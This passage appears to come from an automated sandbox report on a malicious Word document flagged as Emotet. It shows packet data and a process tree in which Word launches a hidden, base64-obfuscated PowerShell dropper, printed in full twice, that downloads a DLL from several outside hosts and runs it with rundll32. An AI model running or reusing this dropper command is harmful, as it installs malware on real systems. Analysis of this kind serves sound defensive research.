HX)ctRZ\|BO(.n>G`($F,&+H,_dx--kBJC>FMhN-ezuRA\|6Yg@)xs2\l+%I5V8`m~6[_A<5O9^~aHhDE.G{N!&iVN>9'#J~A%vhk=Xk{T+X7<Uu.JbV;[mC&32B!=U)-;O
Jan 13, 2021 16:32:10.358134985 CET	457	IN	Data Raw: ee ea 66 87 37 3e 11 05 25 37 b5 99 54 c8 49 cd 3c bc 62 08 a5 69 ce c1 97 24 4f 3e 23 1f d3 3c da ed e9 f4 30 12 a2 de dd e3 85 c0 7b 1e 96 e1 91 48 f9 b8 14 57 ce 07 87 6d 6f 3a fb 38 60 47 6a bb 99 2e 52 1c 74 bd 9c 78 0b 76 b5 5a 75 89 5e 3a Data Ascii: f7>%7TI<bi$O>#<0{HWmo:8`Gj.RtxvZu^:vr[yKjzq>_\|Ut`
Jan 13, 2021 16:32:10.666205883 CET	459	IN	Data Raw: 87 ea 02 ad 5a d1 3a 63 f8 8f cd e9 2a 8d 33 6a ba b9 81 e3 ab e1 f9 c5 d1 c9 91 e3 79 91 a2 5c a4 a9 f8 aa d5 dc b0 ea fc 5e 52 81 4e 1e 5e ca 58 6f a9 e2 f0 6e 9b 8e e1 75 c3 ec 34 92 fb f8 bd d3 b5 0c 1e f2 28 c2 b9 54 2a 12 ef 9a cf 51 af f5 Data Ascii: Z:c3jy\^RN^Xonu4(TQiOtJ]2;.=xcpI:*Qn-G_7+&i?J}P8J1qyrsDz.s"cYi7&-s+?Km2~T0Ps
Jan 13, 2021 16:32:10.666230917 CET	459	IN	Data Raw: 2c 0c 3b 45 fd c7 a5 ae 04 36 67 62 42 72 c0 0e db 9c fb 5b c4 9a ae 4a 19 2f 7c 67 b8 0e ec 21 11 b4 f6 85 32 7f c9 d3 d3 0c c0 11 8e 78 0b 83 4d 4e cf 28 d9 7b 83 f7 28 91 05 d4 0b c3 15 4a ed c1 a6 4f 40 78 8a 1c 7f 4b c1 6f 00 2b eb d2 25 18 Data Ascii: ,;E6gbBr[J/\|g!2xMN({(JO@xKo+%6m@p.$`{BSI^v0k?osZN2c._Mv:mcZ#`6I@nf72_J_ZQ/",DQX y(Ps>jb=#iBjOR3X9L

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 648 Parent PID: 584

General

Start time:	16:31:41
Start date:	13/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f990000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2456 Parent PID: 1220

General

Start time:	16:31:43
Start date:	13/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA
Imagebase:	0x4a6c0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2496 Parent PID: 2456

General

Start time:	16:31:44
Start date:	13/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff720000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2300 Parent PID: 2456

General

Start time:	16:31:44
Start date:	13/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA
Imagebase:	0x13f790000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2103844038.00000000003F6000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2103894665.0000000001C16000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2548 Parent PID: 2300

General

Start time:	16:31:48
Start date:	13/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
Imagebase:	0xff4c0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2384 Parent PID: 2548

General

Start time:	16:31:48
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2106786697.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2800 Parent PID: 2384

General

Start time:	16:31:49
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2108974608.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2792 Parent PID: 2800

General

Start time:	16:31:50
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2111015590.0000000000150000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2748 Parent PID: 2792

General

Start time:	16:31:51
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2112674690.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1980 Parent PID: 2748

General

Start time:	16:31:52
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2114888366.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2452 Parent PID: 1980

General

Start time:	16:31:53
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2117620078.0000000000250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2836 Parent PID: 2452

General

Start time:	16:31:54
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL
Imagebase:	0xb60000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
